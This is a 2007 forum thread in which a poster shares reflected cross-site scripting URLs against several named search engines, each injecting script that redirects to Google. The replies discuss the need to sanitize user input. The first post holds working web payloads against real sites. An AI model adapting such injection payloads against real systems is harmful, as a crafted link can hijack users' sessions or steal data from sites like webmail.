Topic: Google taking over other search engines! (aka fun with XSS) Pages that link to <a href="https://ozoneasylum.com/backlink?for=29278" title="Pages that link to Topic: Google taking over other search engines! (aka fun with XSS)" rel="nofollow" >Topic: Google taking over other search engines! (aka fun with XSS)\

 
Author Thread
wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

IP logged posted posted 06-12-2007 17:11 Edit Quote

Brainboost:
http://www.brainboost.com/search.asp?Q=%22%3C/title%3E%3Cscript%3Edocument.location='http://www.google.com'</script>
Lycos:
http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E&x=31&y=11
Hotbot:
http://www.hotbot.com/?nil_suggest=btn&ps=&loc=searchbox&tab=web&mode=search&currProv=ask&query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E
Ask:
http://uk.ask.com/web?q=a&search=search&dm=all&qsrc=0&o=312&l=dir&jss=%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E
Chacha:
http://search.chacha.com/search/query?query=%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com

all googlicised!

Wrayal

Tyberius Prime
Maniac (V) Mad Scientist with Finglongers

From: Germany
Insane since: Sep 2001

IP logged posted posted 06-13-2007 00:12 Edit Quote

br... you'd think the at sanitize their input somewhat.

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

IP logged posted posted 06-13-2007 01:10 Edit Quote

why would they ? user input is always clean and well intended.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

IP logged posted posted 06-13-2007 01:12 Edit Quote

Poi: Seriously? I agree XSS looks harmless at first, but what (say) if you found a similar flaw in the search function for gmail.google.com and formed a carefully crafted link there? These are only fun but...meh...

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

IP logged posted posted 06-13-2007 01:42 Edit Quote

No. I was kidding. Of course input, any input, MUST be sanitized.

At work, people get slammed whenever they don't sanitize user or 3rd party input. Seriously. And our QA people can come up with really sneaky ways to inject script and have us fix our code.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

IP logged posted posted 06-13-2007 01:45 Edit Quote

Oh hehe, ok. Sorry, I misread it as serious. I was sad to find out that the only one that had taken any effort (ask) was already in MOSEB =(



Post Reply
 
Your User Name:
Your Password:
Login Options:
 
Your Text:
Loading...
Options:


« BackwardsOnwards »

Show Forum Drop Down Menu